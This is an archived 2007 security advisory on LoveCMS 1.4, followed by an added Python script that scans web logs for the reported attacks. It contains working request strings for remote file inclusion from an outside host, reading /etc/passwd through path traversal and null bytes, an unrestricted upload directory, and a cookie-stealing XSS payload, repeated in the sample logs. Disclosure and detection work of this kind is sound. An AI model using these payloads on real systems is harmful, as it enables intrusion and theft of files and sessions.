Securityvulns SECURITYVULNS:DOC:16148
Feb 22, 2007 - 12:00 a.m.

LoveCMS 1.4 multiple vulnerabilities

RFI:
/lovecms/install/index.php?step=http://site.com/boum.txt?

LFI:
/lovecms/install/index.php?step=/etc/passwd%00
/lovecms/?load=…/…/…/…/…/…/…/…/…/…/etc/passwd%00

Admin upload vulnerability:
Any kind of file can be uploaded; even if its type is not accepted, it is stored here:
/modules/content/pictures/tmp/

XSS (GET) via SQL error:
/lovecms/?load=content&id='</textarea>'"><script>alert(document.cookie)</script>

laurent gaffie
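
For defenders reviewing web server logs of a LoveCMS 1.4 install, the following is an added example (not part of the original advisory or of LoveCMS) that flags requests matching the four issues listed above. It assumes legitimate `step` and `load` values are simple tokens such as `content` and that only image files are meant to be served from the tmp directory; the log lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed access-log lines (combined format). The request targets on
# lines 1, 2 and 4 mirror the advisory; the others are made up for the example.
SAMPLE_LOG = [
    '198.51.100.7 - - [22/Feb/2007:10:00:01 +0000] "GET /lovecms/install/index.php?step=http://site.com/boum.txt? HTTP/1.1" 200 512',
    '198.51.100.7 - - [22/Feb/2007:10:00:02 +0000] "GET /lovecms/install/index.php?step=/etc/passwd%00 HTTP/1.1" 200 900',
    '198.51.100.7 - - [22/Feb/2007:10:00:03 +0000] "GET /lovecms/?load=../../etc/passwd%00 HTTP/1.1" 200 900',
    '198.51.100.7 - - [22/Feb/2007:10:00:04 +0000] "GET /lovecms/?load=content&id=%27%3C/textarea%3E%27%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E HTTP/1.1" 200 700',
    '198.51.100.7 - - [22/Feb/2007:10:00:05 +0000] "GET /lovecms/modules/content/pictures/tmp/test.php HTTP/1.1" 200 10',
    '192.0.2.10 - - [22/Feb/2007:10:00:06 +0000] "GET /lovecms/?load=content&id=3 HTTP/1.1" 200 4096',
]

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
INCLUDE_PARAMS = {"step", "load"}            # parameters the advisory shows being included
SAFE_TOKEN = re.compile(r"[A-Za-z0-9_-]+")   # assumption: valid values look like "content"
MARKUP = re.compile(r"""[<>"']""")           # characters that break out of the error page
UPLOAD_DIR = "/modules/content/pictures/tmp/"
IMAGE_EXT = (".jpg", ".jpeg", ".png", ".gif")  # assumption: only images belong there

def classify(target):
    """Return the set of advisory categories a request target matches."""
    parts = urlsplit(target)
    hits = set()
    path = parts.path.lower()
    if UPLOAD_DIR in path and not path.endswith(IMAGE_EXT):
        hits.add("upload")
    # parse_qsl percent-decodes, so %00 arrives here as a real NUL byte
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if name in INCLUDE_PARAMS and not SAFE_TOKEN.fullmatch(value):
            if "://" in value:
                hits.add("rfi")
            if "\x00" in value or ".." in value or value.startswith("/"):
                hits.add("lfi")
        elif name == "id" and MARKUP.search(value):
            hits.add("xss")
    return hits

def scan(lines):
    """Return [(line_number, sorted categories)] for log lines that match."""
    findings = []
    for n, line in enumerate(lines, 1):
        m = REQUEST_RE.search(line)
        hits = classify(m.group(1)) if m else set()
        if hits:
            findings.append((n, sorted(hits)))
    return findings
```

A hit on a request under the tmp directory means a non-image file was requested there, which is worth checking against the files actually present on disk.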